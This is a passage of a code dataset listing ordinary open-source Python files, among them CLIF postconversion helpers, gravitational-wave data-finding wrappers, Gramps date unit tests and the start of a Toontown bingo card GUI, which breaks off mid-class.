Dataset columns:
  code       string  (length 3 to 1.05M characters)
  repo_name  string  (length 5 to 104)
  path       string  (length 4 to 251)
  language   string  (1 distinct value)
  license    string  (15 distinct values)
  size       int64   (3 to 1.05M)
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Prepare postconversions for Clif_PyObjFrom.

For each cpp_type conversion
  Clif_PyObjFrom(cpp_type, py::PostConv(conv_array, array_len, template))
call we prepare the template with ConversionTemplate after we transformed the
type postconversion map from AST into indexes to the generated conv_array.
The len is the same as the map.

Example:
  postconversion = {'str': 'BytesToUnicode', 'ztype': 'AnotherConversion'}
GenPostConvTable() generates
  #define _0 py::postconv::PASS
  #define _1 BytesToUnicode
  #define _2 AnotherConversion
and transforms the postconversion to {'str': 1, 'ztype': 2}.

Now Initializer() will translate lang_type to a template string as
  int -> {}
  str -> _1
  list<int> -> {}
  list<str> -> {_1}
  dict<int, pair<str, ztype>> -> {_0,{_1,_2}}
"""

PASS = '{}'

# Hard-coded for now. We may want to generalize this in the future, but not
# until after finishing the pybind11 integration.
MARKED_NON_RAISING_SUPPORTED_TYPES = (
    '::clif_testing::TestNonRaising',
    '::absl::Status',
)


def GenPostConvTable(postconv_types):
  """Transform postconv_types dict(typename: convfunctionname) and yield it."""
  size = len(postconv_types)
  if size:
    yield ''
    yield '#define _0 py::postconv::PASS'
    # We need to sort for deterministic output.
    for index, pytype in enumerate(sorted(postconv_types), 1):
      size -= 1
      yield '#define _%d ' % index + postconv_types[pytype]
      postconv_types[pytype] = '_%d' % index


def Initializer(ast_type, postconv_types_index_map, nested=False,
                marked_non_raising=False):
  """Transform [complex] ast_type to a postconversion initializer_list."""
  if ast_type.HasField('callable'):
    # TODO: Fix postconv for callable.
    # print ast_type
    return PASS
  if (marked_non_raising and
      ast_type.cpp_type in MARKED_NON_RAISING_SUPPORTED_TYPES):
    return 'py::postconv::MarkedNonRaising'
  if not postconv_types_index_map:
    return PASS
  if ast_type.params:  # container type
    index = '{%s}' % ','.join(
        Initializer(t, postconv_types_index_map, nested=True)
        for t in ast_type.params)
  else:
    index = postconv_types_index_map.get(ast_type.lang_type, '_0')
  # If no table-based conversions needed, return "no_conversion".
  return index if nested or index.strip('{_0,}') else PASS
google/clif
clif/python/postconv.py
Python
apache-2.0
2,878
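A minimal sketch of how the generator above behaves, using the dict from its own docstring (it assumes the module is importable as clif.python.postconv, per the path column):

    # Sketch only: import path assumed from the row's path (clif/python/postconv.py).
    from clif.python import postconv

    types = {'str': 'BytesToUnicode', 'ztype': 'AnotherConversion'}
    for line in postconv.GenPostConvTable(types):
        print(line)
    # Prints (after an initial blank line):
    #   #define _0 py::postconv::PASS
    #   #define _1 BytesToUnicode
    #   #define _2 AnotherConversion
    # and rewrites `types` in place to {'str': '_1', 'ztype': '_2'},
    # which Initializer() then uses to build strings such as '{_1}' for list<str>.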
from sys import argv

# Author : Satheesh Gopalan

# LIST TO TAKE IN ALL ARGUMENTS INTO THE LIST 'S'
s = argv

# PRINT THE NUMBER OF ARGUMENTS
print 'Number of arguments were : ' + str(len(s))

# PRINT THE ARGUMENTS
for i in range(len(s)):
    print "Arg [" + str(i) + "]: " + str(s[i])
satheeshgopalan/python
take_arg_print_arg.py
Python
mit
287
# coding=utf-8 # Copyright (C) Duncan Macleod (2015) # # This file is part of the GW DetChar python package. # # GW DetChar is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # GW DetChar is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GW DetChar. If not, see <http://www.gnu.org/licenses/>. """gw_data_find wrappers """ import re import warnings from six.moves.urllib.error import HTTPError try: # python >= 3 from json.decoder import JSONDecodeError except ImportError: # python == 2.7 JSONDecodeError = ValueError import gwdatafind from ..const import DEFAULT_SEGMENT_SERVER from gwpy.io import gwf as io_gwf from gwpy.segments import (Segment, DataQualityFlag) from gwpy.timeseries import (TimeSeries, TimeSeriesDict) __author__ = 'Duncan Macleod <[email protected]>' __credits__ = 'Alex Urban <[email protected]>' # -- utilities ---------------------------------------------------------------- def check_flag(flag, gpstime, duration, pad): """Check that a state flag is active during an entire analysis segment Parameters ---------- flag : `str` state flag to check gpstime : `float` GPS time of required data duration : `float` duration (in seconds) of required data pad : `float` amount of extra data to read in at the start and end for filtering Returns ------- check : `bool` Boolean switch to pass (`True`) or fail (`False`) depending on whether the given flag is active """ # set GPS start and end time start = gpstime - duration/2. - pad end = gpstime + duration/2. + pad seg = Segment(start, end) # query for state segments active = DataQualityFlag.query(flag, start, end, url=DEFAULT_SEGMENT_SERVER).active # check that state flag is active during the entire analysis if (not active.intersects_segment(seg)) or (abs(active[0]) < abs(seg)): return False return True def remove_missing_channels(channels, gwfcache): """Find and remove channels from a given list that are not available in a given cache of frame files Parameters ---------- channels : `list` of `str` list of requested channels gwfcache : `list` of `str` list of paths to .gwf files Returns ------- keep : `list` of `str` list of common channels found in the first and last files in the cache Notes ----- As a shorthand, this utility checks `channels` against only the first and last frame files in `gwfcache`. This saves time and memory by not loading tables of contents for large numbers of very long data files. For every channel requested that is not available in `gwfcache`, a `UserWarning` will be raised. 
See Also -------- gwpy.io.gwf.iter_channel_names for the utility used to identify frame contents """ # get available channels from the first and last frame file available = set(io_gwf.iter_channel_names(gwfcache[0])) if len(gwfcache) > 1: available.intersection_update(io_gwf.iter_channel_names(gwfcache[-1])) # work out which channels to keep, and which to reject channels = set(channels) keep = channels & available reject = channels - keep for channel in reject: warnings.warn( '{} is being removed because it was not available in all ' 'requested files'.format(channel), UserWarning) return list(keep) def get_data(channel, start, end, frametype=None, source=None, nproc=1, verbose=False, **kwargs): """Retrieve data for given channels within a certain time range Parameters ---------- channel : `str` or `list` either a single channel name, or a list of channel names start : `float` GPS start time of requested data end : `float` GPS end time of requested data frametype : `str`, optional name of frametype in which channel(s) are stored, default: `None` source : `str`, `list`, optional path(s) of a LAL-format cache file or individual data file, default: `None` nproc : `int`, optional number of parallel processes to use, uses serial process by default verbose : `bool`, optional print verbose output about NDS progress, default: False **kwargs : `dict`, optional additional keyword arguments to `~gwpy.timeseries.TimeSeries.read` or `~gwpy.timeseries.TimeSeries.get` Returns ------- data : `~gwpy.timeseries.TimeSeries` or `~gwpy.timeseries.TimeSeriesDict` collection of data for the requested channels in the requested time range Notes ----- If `channel` is a `str`, then a `TimeSeries` object will be returned, else the result is a `TimeSeriesDict`. The `frametype` argument should be used to read from archived frame files, while `source` should be used to read from a local cache or specific data file. If either fails, or if neither is passed, this function will attempt to get data over an NDS server. If `frametype` is used to read from the archive, any channels missing from the first or last frame file in the requested time range will be ignored. See Also -------- remove_missing_channels a utility that removes channels missing from the frame archive gwpy.timeseries.TimeSeries.get the underlying method to read data over an NDS server gwpy.timeseries.TimeSeries.read the underlying method to read data from local files """ # get TimeSeries class if isinstance(channel, (list, tuple)): series_class = TimeSeriesDict else: series_class = TimeSeries if frametype is not None: try: # locate frame files ifo = re.search('[A-Z]1', frametype).group(0) obs = ifo[0] source = gwdatafind.find_urls(obs, frametype, start, end) except AttributeError: raise AttributeError( 'Could not determine observatory from frametype') except (HTTPError, JSONDecodeError): # frame files not found pass if isinstance(source, list) and isinstance(channel, (list, tuple)): channel = remove_missing_channels(channel, source) if source is not None: # read from frame files return series_class.read( source, channel, start=start, end=end, nproc=nproc, verbose=verbose, **kwargs) # read single channel from NDS if not isinstance(channel, (list, tuple)): return series_class.get( channel, start, end, verbose=verbose, **kwargs) # if all else fails, process channels in groups of 60 data = series_class() for group in [channel[i:i + 60] for i in range(0, len(channel), 60)]: data.append(series_class.get( group, start, end, verbose=verbose, **kwargs)) return data
lscsoft/gwdetchar
gwdetchar/io/datafind.py
Python
gpl-3.0
7,423
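A hedged usage sketch for the get_data() wrapper above; the channel and frametype names below are placeholders, not values taken from the file, and the GPS times are arbitrary:

    from gwdetchar.io.datafind import get_data

    # A single channel name returns a gwpy TimeSeries; a list would return a
    # TimeSeriesDict. With frametype set, data are read from archived frame
    # files located via gwdatafind, falling back to an NDS query if the frame
    # search fails. 'X1:TEST-CHANNEL' and 'X1_TEST_FRAMES' are hypothetical.
    data = get_data('X1:TEST-CHANNEL', start=1234567890, end=1234567990,
                    frametype='X1_TEST_FRAMES', nproc=4)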
# -*- coding: UTF-8 -*-

SSSA_LOG = "/var/log/sssa.log"
CONFIG_INI = '/etc/sssa.conf'

CONFIG_DEFAUTLS = {'host': 'localhost',
                   'port': '8125',
                   # 'prefix': 'sssa',
                   'group': 'servers',
                   'hostname': '____',
                   'period': '30',
                   'fake': 'true'}

DEBUG = False
mariodebian/server-stats-system-agent
sssa/__init__.py
Python
gpl-2.0
382
# -*- coding: utf-8 -*- """ @file @brief quelques fonctions à propos de la première séance """ def commentaire_accentues(): """ L'aide de cette fonction contient assuréments des accents. @FAQ(Python n'accepte pas les accents) Le langage Python a été conçu en langage anglais. Dès qu'on on ajoute un caractère qui ne fait pas partie de l'alphabet anglais (ponctuation comprise), il déclenche une erreur : @code File "faq_cvxopt.py", line 3 SyntaxError: Non-UTF-8 code starting with '\xe8' in file faq_cvxopt.py on line 4, but no encoding declared; see http://python.org/dev/peps/pep-0263/ for details @endcode Pour la résoudre, il faut dire à l'interpréteur que des caractères non anglais peuvent apparaître et écrire sur la première ligne du programme : @code # -*- coding: latin-1 -*- @endcode Ou pour tout caractère y compris chinois : @code # -*- coding: utf-8 -*- @endcode Si vous utilisez l'éditeur `SciTE <http://www.scintilla.org/SciTE.html>`_ sous Windows, après avoir ajouté cette ligne avec l'encoding `utf-8`, il est conseillé de fermer le fichier puis de le réouvrir. SciTE le traitera différemment. @endFAQ """ pass
sdpython/pyquickhelper
_unittests/ut_sphinxext/data/session1.py
Python
mit
1,282
# # Gramps - a GTK+/GNOME based genealogy program # # Copyright (C) 2007 Donald N. Allingham # Copyright (C) 2013-2014 Vassilii Khachaturov # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # """ Unittest for testing dates """ #------------------------------------------------------------------------- # # Standard python modules # #------------------------------------------------------------------------- import unittest #------------------------------------------------------------------------- # # Gramps modules # #------------------------------------------------------------------------- from ...config import config from ...datehandler import get_date_formats, set_format from ...datehandler import parser as _dp from ...datehandler import displayer as _dd from ...datehandler._datedisplay import DateDisplayEn from ...lib.date import Date, DateError, Today, calendar_has_fixed_newyear date_tests = {} # first the "basics". testset = "basic test" dates = [] calendar = Date.CAL_GREGORIAN for quality in (Date.QUAL_NONE, Date.QUAL_ESTIMATED, Date.QUAL_CALCULATED): for modifier in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT): for month in range(1,13): d = Date() d.set(quality,modifier,calendar,(4,month,1789,False),"Text comment") dates.append( d) for modifier in (Date.MOD_RANGE, Date.MOD_SPAN): for month1 in range(1,13): for month2 in range(1,13): d = Date() d.set(quality,modifier,calendar,(4,month1,1789,False,5,month2,1876,False),"Text comment") dates.append( d) modifier = Date.MOD_TEXTONLY d = Date() d.set(quality,modifier,calendar,Date.EMPTY,"This is a textual date") dates.append( d) date_tests[testset] = dates # incomplete dates (day or month missing) testset = "partial date" dates = [] calendar = Date.CAL_GREGORIAN for quality in (Date.QUAL_NONE, Date.QUAL_ESTIMATED, Date.QUAL_CALCULATED): for modifier in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT): d = Date() d.set(quality,modifier,calendar,(0,11,1789,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,0,1789,False),"Text comment") dates.append( d) for modifier in (Date.MOD_RANGE, Date.MOD_SPAN): d = Date() d.set(quality,modifier,calendar,(4,10,1789,False,0,11,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(4,10,1789,False,0,0,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,10,1789,False,5,11,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,10,1789,False,0,11,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,10,1789,False,0,0,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,0,1789,False,5,11,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,0,1789,False,0,11,1876,False),"Text 
comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,0,1789,False,0,0,1876,False),"Text comment") dates.append( d) date_tests[testset] = dates # slash-dates testset = "slash-dates" dates = [] calendar = Date.CAL_GREGORIAN for quality in (Date.QUAL_NONE, Date.QUAL_ESTIMATED, Date.QUAL_CALCULATED): for modifier in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT): # normal date d = Date() d.set(quality,modifier,calendar,(4,11,1789,True),"Text comment") dates.append( d) for modifier in (Date.MOD_RANGE, Date.MOD_SPAN): d = Date() d.set(quality,modifier,calendar,(4,11,1789,True,5,10,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(4,11,1789,False,5,10,1876,True),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(4,11,1789,True,5,10,1876,True),"Text comment") dates.append( d) date_tests[testset] = dates # BCE testset = "B. C. E." dates = [] calendar = Date.CAL_GREGORIAN for quality in (Date.QUAL_NONE, Date.QUAL_ESTIMATED, Date.QUAL_CALCULATED): for modifier in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT): # normal date d = Date() d.set(quality,modifier,calendar,(4,11,-90,False),"Text comment") dates.append( d) for modifier in (Date.MOD_RANGE, Date.MOD_SPAN): d = Date() d.set(quality,modifier,calendar,(5,10,-90,False,4,11,-90,False),"Text comment") dates.append( d) d = Date() date_tests[testset] = dates # test for all other different calendars testset = "Non-gregorian" dates = [] for calendar in (Date.CAL_JULIAN, Date.CAL_HEBREW, Date.CAL_ISLAMIC, Date.CAL_FRENCH, Date.CAL_PERSIAN, ): for quality in (Date.QUAL_NONE, Date.QUAL_ESTIMATED, Date.QUAL_CALCULATED): for modifier in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT): d = Date() d.set(quality,modifier,calendar,(4,11,1789,False),"Text comment") dates.append( d) for modifier in (Date.MOD_RANGE, Date.MOD_SPAN): d = Date() d.set(quality,modifier,calendar,(4,10,1789,False,5,11,1876,False),"Text comment") dates.append( d) # CAL_SWEDISH - Swedish calendar 1700-03-01 -> 1712-02-30! class Context: def __init__(self, retval): self.retval = retval def __enter__(self): return self.retval def __exit__(self, *args, **kwargs): pass with Context(Date.CAL_SWEDISH) as calendar: for quality in (Date.QUAL_NONE, Date.QUAL_ESTIMATED, Date.QUAL_CALCULATED): for modifier in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT): d = Date() d.set(quality,modifier,calendar,(4,11,1700,False),"Text comment") dates.append( d) for modifier in (Date.MOD_RANGE, Date.MOD_SPAN): d = Date() d.set(quality,modifier,calendar,(4,10,1701,False, 5,11,1702,False),"Text comment") dates.append( d) quality = Date.QUAL_NONE modifier = Date.MOD_NONE for calendar in (Date.CAL_JULIAN, Date.CAL_ISLAMIC, Date.CAL_PERSIAN, ): for month in range(1,13): d = Date() d.set(quality,modifier,calendar,(4,month,1789,False),"Text comment") dates.append( d) for calendar in (Date.CAL_HEBREW, Date.CAL_FRENCH): for month in range(1,14): d = Date() d.set(quality,modifier,calendar,(4,month,1789,False),"Text comment") dates.append( d) date_tests[testset] = dates swedish_dates = [] # CAL_SWEDISH - Swedish calendar 1700-03-01 -> 1712-02-30! 
with Context(Date.CAL_SWEDISH) as calendar: for year in range(1701, 1712): for month in range(1,13): d = Date() d.set(quality,modifier,calendar,(4,month,year,False),"Text comment") swedish_dates.append( d) #------------------------------------------------------------------------- # # BaseDateTest # #------------------------------------------------------------------------- class BaseDateTest(unittest.TestCase): """ Base class for all date tests. """ def setUp(self): config.set('behavior.date-before-range', 9999) config.set('behavior.date-after-range', 9999) config.set('behavior.date-about-range', 10) #------------------------------------------------------------------------- # # ParserDateTest # #------------------------------------------------------------------------- class ParserDateTest(BaseDateTest): """ Date displayer and parser tests. """ def do_case(self, testset): for date_format in range(len(get_date_formats())): set_format(date_format) for dateval in date_tests[testset]: datestr = _dd.display(dateval) ndate = _dp.parse(datestr) self.assertTrue(dateval.is_equal(ndate), "dateval fails is_equal in format %d:\n" " '%s' != '%s'\n" " '%s' != '%s'\n" % (date_format, dateval, ndate, dateval.__dict__, ndate.__dict__)) def test_basic(self): self.do_case("basic test") def test_partial(self): self.do_case("partial date") def test_slash(self): self.do_case("slash-dates") def test_bce(self): self.do_case("B. C. E.") def test_non_gregorian(self): self.do_case("Non-gregorian") #------------------------------------------------------------------------- # # MatchDateTest # #------------------------------------------------------------------------- ENGLISH_DATE_HANDLER = (_dd.__class__ == DateDisplayEn) @unittest.skipUnless(ENGLISH_DATE_HANDLER, "This test of Date() matching logic can only run in English locale.") class MatchDateTest(BaseDateTest): """ Date match tests. 
""" tests = [("before 1960", "before 1961", True), ("before 1960", "before 1960", True), ("before 1961", "before 1961", True), ("jan 1, 1960", "jan 1, 1960", True), ("dec 31, 1959", "dec 31, 1959", True), ("before 1960", "jan 1, 1960", False), ("before 1960", "dec 31, 1959", True), ("abt 1960", "1960", True), ("abt 1960", "before 1960", True), ("1960", "1960", True), ("1960", "after 1960", False), ("1960", "before 1960", False), ("abt 1960", "abt 1960", True), ("before 1960", "after 1960", False), ("after jan 1, 1900", "jan 2, 1900", True), ("abt jan 1, 1900", "jan 1, 1900", True), ("from 1950 to 1955", "1950", True), ("from 1950 to 1955", "1951", True), ("from 1950 to 1955", "1952", True), ("from 1950 to 1955", "1953", True), ("from 1950 to 1955", "1954", True), ("from 1950 to 1955", "1955", True), ("from 1950 to 1955", "1956", False), ("from 1950 to 1955", "dec 31, 1955", True), ("from 1950 to 1955", "jan 1, 1955", True), ("from 1950 to 1955", "dec 31, 1949", False), ("from 1950 to 1955", "jan 1, 1956", False), ("after jul 4, 1980", "jul 4, 1980", False), ("after jul 4, 1980", "before jul 4, 1980", False), ("after jul 4, 1980", "about jul 4, 1980", True), ("after jul 4, 1980", "after jul 4, 1980", True), ("between 1750 and 1752", "1750", True), ("between 1750 and 1752", "about 1750", True), ("between 1750 and 1752", "between 1749 and 1750", True), ("between 1750 and 1752", "1749", False), ("invalid date", "invalid date", True), ("invalid date", "invalid", False, True), ("invalid date 1", "invalid date 2", False), ("abt jan 1, 2000", "dec 31, 1999", True), ("jan 1, 2000", "dec 31, 1999", False), ("aft jan 1, 2000", "dec 31, 1999", False), ("after jan 1, 2000", "after dec 31, 1999", True), ("after dec 31, 1999", "after jan 1, 2000", True), ("1 31, 2000", "jan 1, 2000", False), ("dec 31, 1999", "jan 1, 2000", False), ("jan 1, 2000", "before dec 31, 1999", False), ("aft jan 1, 2000", "before dec 31, 1999", False), ("before jan 1, 2000", "after dec 31, 1999", False), ("jan 1, 2000/1", "jan 1, 2000", False), ("jan 1, 2000/1", "jan 1, 2001", False), ("jan 1, 2000/1", "jan 1, 2000/1", True), ("jan 1, 2000/1", "jan 14, 2001", True), ("jan 1, 2000/1", "jan 1, 2001 (julian)", True), ("about 1984", "about 2005", False), ("about 1990", "about 2005", True), ("about 2007", "about 2006", True), ("about 1995", "after 2000", True), ("about 1995", "after 2005", False), ("about 2007", "about 2003", True), ("before 2007", "2000", True), # offsets # different calendar, same date ("1800-8-3", "15 Thermidor 8 (French Republican)", True), ("after 1800-8-3", "before 15 Thermidor 8 (French Republican)", False), ("ab cd", "54 ab cd 2000", True, False), ("1700-02-29 (Julian)", "1700-03-01 (Swedish)", True), ("1706-12-31 (Julian)", "1707-01-01 (Swedish)", True), ("1712-02-28 (Julian)", "1712-02-29 (Swedish)", True), ("1712-02-29 (Julian)", "1712-02-30 (Swedish)", True), # See bug# 7100 ("1233-12-01", "1234-12-01 (Mar25)", True), ("1234-01-04", "1234-01-04 (Mar25)", True), # See bug# 7158 # Some issues passing Travis close to midnight; not sure why: # ("today", Today(), True), # ("today (Hebrew)", Today(), True), ("today", "today", True), (Today(), Today(), True), # See bug# 7197 ("1788-03-27", "1789-03-27 (Mar25)", True), ("1788-03-27 (Julian)", "1789-03-27 (Julian, Mar25)", True), ] def convert_to_date(self, d): return d if isinstance(d,Date) else _dp.parse(d) def do_case(self, d1, d2, expected1, expected2=None): """ Tests two Gramps dates to see if they match. 
""" if expected2 is None: expected2 = expected1 self.assertMatch(d1, d2, expected1) self.assertMatch(d2, d1, expected2) def assertMatch(self, d1, d2, expected): date1 = self.convert_to_date(d1) date2 = self.convert_to_date(d2) result = date2.match(date1) self.assertEqual(result, expected, "'{}' {} '{}'\n({} vs {})".format( d1, ("did not match" if expected else "matched"), d2, date1.__dict__, date2.__dict__)) def test_match(self): for testdata in self.tests: self.do_case(*testdata) #------------------------------------------------------------------------- # # ArithmeticDateTest # #------------------------------------------------------------------------- class ArithmeticDateTest(BaseDateTest): """ Date arithmetic tests. """ tests = [ # Date +/- int/tuple -> Date ("Date(2008, 1, 1) - 1", "Date(2007, 1, 1)"), ("Date(2008, 1, 1) + 1", "Date(2009, 1, 1)"), ("Date(2008, 1, 1) - (0,0,1)", "Date(2007, 12, 31)"), ("Date(2008, 1, 1) - (0,0,2)", "Date(2007, 12, 30)"), ("Date(2008) - (0,0,1)", "Date(2007, 12, 31)"), ("Date(2008) - 1", "Date(2007, 1, 1)"), ("Date(2008, 12, 31) + (0, 0, 1)", "Date(2009, 1, 1)"), ("Date(2000,1,1) - (0,11,0)", "Date(1999, 2, 1)"), ("Date(2000,1,1) - (0,1,0)", "Date(1999, 12, 1)"), ("Date(2008, 1, 1) + (0, 0, 32)", "Date(2008, 2, 2)"), ("Date(2008, 2, 1) + (0, 0, 32)", "Date(2008, 3, 4)"), ("Date(2000) - (0, 1, 0)", "Date(1999, 12, 1)"), ("Date(2000) + (0, 1, 0)", "Date(2000, 1, 0)"), # Ok? ("Date(2000, 1, 1) - (0, 1, 0)", "Date(1999, 12, 1)"), ("Date(2000, 1, 1) - 1", "Date(1999, 1, 1)"), ("Date(2000) - 1", "Date(1999)"), ("Date(2000) + 1", "Date(2001)"), # Date +/- Date -> Span ("(Date(1876,5,7) - Date(1876,5,1)).tuple()", "(0, 0, 6)"), ("(Date(1876,5,7) - Date(1876,4,30)).tuple()", "(0, 0, 7)"), ("(Date(2000,1,1) - Date(1999,2,1)).tuple()", "(0, 11, 0)"), ("(Date(2000,1,1) - Date(1999,12,1)).tuple()", "(0, 1, 0)"), ("(Date(2007, 12, 23) - Date(1963, 12, 4)).tuple()", "(44, 0, 19)"), ("(Date(1963, 12, 4) - Date(2007, 12, 23)).tuple()", "(-44, 0, -19)"), ] def test_evaluate(self): for exp1, exp2 in self.tests: val1 = eval(exp1) val2 = eval(exp2) self.assertEqual(val1, val2, "'%s' should be '%s' but was '%s'" % (exp1, val2, val1)) #------------------------------------------------------------------------- # # SwedishDateTest # #------------------------------------------------------------------------- class SwedishDateTest(BaseDateTest): """ Swedish calendar tests. """ def test_swedish(self): for date in swedish_dates: self.assertEqual(date.sortval, date.to_calendar('gregorian').sortval) class Test_set2(BaseDateTest): """ Test the Date.set2_... 
setters -- the ones to manipulate the 2nd date of a compound date """ def setUp(self): self.date = d = Date() d.set(modifier=Date.MOD_RANGE, #d m y sl--d m y sl value=(1, 1, 2000, 0, 1, 1, 2010, 0)) def testStartStopSanity(self): start,stop = self.date.get_start_stop_range() self.assertEqual(start, (2000, 1, 1)) self.assertEqual(stop, (2010, 1, 1)) def test_set2_ymd_overrides_stop_date(self): self.date.set2_yr_mon_day(2013, 2, 2) start,stop = self.date.get_start_stop_range() self.assertEqual(start, (2000, 1, 1)) self.assertEqual(stop, (2013, 2, 2)) def test_set_ymd_overrides_both_dates(self): self.date.set_yr_mon_day(2013, 2, 2, remove_stop_date = True) start,stop = self.date.get_start_stop_range() self.assertEqual(start, stop) self.assertEqual(stop, (2013, 2, 2)) def test_set_ymd_offset_updates_both_ends(self): self.date.set_yr_mon_day_offset(+2, +2, +2) start,stop = self.date.get_start_stop_range() self.assertEqual(start, (2002, 3, 3)) self.assertEqual(stop, (2012, 3, 3)) def test_set2_ymd_offset_updates_stop_date(self): self.date.set2_yr_mon_day_offset(+7, +5, +5) start,stop = self.date.get_start_stop_range() self.assertEqual(start, (2000, 1, 1)) self.assertEqual(stop, (2017, 6, 6)) def test_copy_offset_ymd_preserves_orig(self): copied = self.date.copy_offset_ymd(year=-1) self.testStartStopSanity() start,stop = copied.get_start_stop_range() self.assertEqual(start, (1999, 1, 1)) self.assertEqual(stop, (2009, 1, 1)) def test_copy_ymd_preserves_orig(self): copied = self.date.copy_ymd(year=1000, month=10, day=10, remove_stop_date=True) self.testStartStopSanity() start,stop = copied.get_start_stop_range() self.assertEqual(start, (1000, 10, 10)) self.assertEqual(stop, (1000, 10, 10)) def _test_set2_function_raises_error_unless_compound(self, function): for mod in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT, Date.MOD_TEXTONLY): self.date.set_modifier(mod) try: function(self.date) self.assertTrue(False, "Modifier: {}, dateval: {} - exception expected!".format( mod, self.date.dateval)) except DateError: pass def test_set2_ymd_raises_error_unless_compound(self): self._test_set2_function_raises_error_unless_compound( lambda date: date.set2_yr_mon_day(2013, 2, 2)) def test_set2_ymd_offset_raises_error_unless_compound(self): self._test_set2_function_raises_error_unless_compound( lambda date: date.set2_yr_mon_day_offset(year=-1)) class Test_set_newyear(BaseDateTest): def test_raises_error_iff_calendar_has_fixed_newyear(self): for cal in Date.CALENDARS: d = Date(1111,2,3) should_raise = calendar_has_fixed_newyear(cal) message = "{name} {cal}".format( name = Date.calendar_names[cal], cal = cal) try: d.set(calendar=cal, newyear=2) self.assertFalse(should_raise, message) except DateError: self.assertTrue(should_raise, message) #------------------------------------------------------------------------- # # EmptyDateTest # #------------------------------------------------------------------------- class EmptyDateTest(BaseDateTest): """ Tests for empty dates. 
""" def test_empty(self): d = Date() self.assertTrue(d.is_empty()) def test_text_only_empty(self): d = Date() d.set(text='First of Jan', modifier=Date.MOD_TEXTONLY) self.assertFalse(d.is_empty()) def test_single_empty(self): d = Date() d.set(value=(1, 1, 1900, False), modifier=Date.MOD_NONE) self.assertFalse(d.is_empty()) def test_range_empty(self): d = Date() d.set(value=(1, 1, 1900, False, 1, 1, 1910, False), modifier=Date.MOD_RANGE) self.assertFalse(d.is_empty()) def test_span_empty(self): d = Date() d.set(value=(1, 1, 1900, False, 1, 1, 1910, False), modifier=Date.MOD_SPAN) self.assertFalse(d.is_empty()) if __name__ == "__main__": unittest.main()
SNoiraud/gramps
gramps/gen/lib/test/date_test.py
Python
gpl-2.0
22,594
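For orientation, a few of the arithmetic identities that ArithmeticDateTest above evaluates, written out directly (the import path is inferred from the test's own relative import of ...lib.date):

    # Sketch only: assumes gramps.gen.lib.date is importable outside the test suite.
    from gramps.gen.lib.date import Date

    Date(2008, 1, 1) - 1                             # -> Date(2007, 1, 1)
    Date(2008, 1, 1) - (0, 0, 1)                     # -> Date(2007, 12, 31)
    Date(2008, 12, 31) + (0, 0, 1)                   # -> Date(2009, 1, 1)
    (Date(1876, 5, 7) - Date(1876, 5, 1)).tuple()    # -> (0, 0, 6), a Span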
from direct.directnotify import DirectNotifyGlobal from direct.gui.DirectGui import * from pandac.PandaModules import * from direct.task import Task import random from toontown.fishing import BingoCardCell from toontown.fishing import BingoGlobals from toontown.fishing import FishBase from toontown.fishing import FishGlobals from direct.showbase import RandomNumGen from toontown.toonbase import ToontownGlobals from toontown.toonbase import ToontownTimer from toontown.toonbase import TTLocalizer from toontown.toontowngui import TTDialog BG = BingoGlobals class BingoCardGui(DirectFrame): notify = DirectNotifyGlobal.directNotify.newCategory('BingoCardGui') def __init__(self, parent = aspect2d, **kw): self.notify.debug('Bingo card initialized') self.model = loader.loadModel('phase_4/models/gui/FishBingo') optiondefs = (('relief', None, None), ('state', DGG.NORMAL, None), ('image', self.model.find('**/g'), None), ('image_color', BG.getColor(0), None), ('image_scale', BG.CardImageScale, None), ('image_hpr', (0.0, 90.0, 0.0), None), ('pos', BG.CardPosition, None)) self.defineoptions(kw, optiondefs) DirectFrame.__init__(self, parent) self.initialiseoptions(BingoCardGui) self.game = None self.cellGuiList = [] self.parent = parent self.load() self.hide() self.taskNameFlashFish = 'flashMatchingFishTask' return def show(self): DirectFrame.show(self) if self.game and self.game.checkForBingo(): self.__indicateBingo(True) if self.game.getGameType() == BG.BLOCKOUT_CARD: self.showJackpot() def hide(self): self.hideTutorial() self.hideJackpot() DirectFrame.hide(self) def loadGameTimer(self): self.timer = ToontownTimer.ToontownTimer() 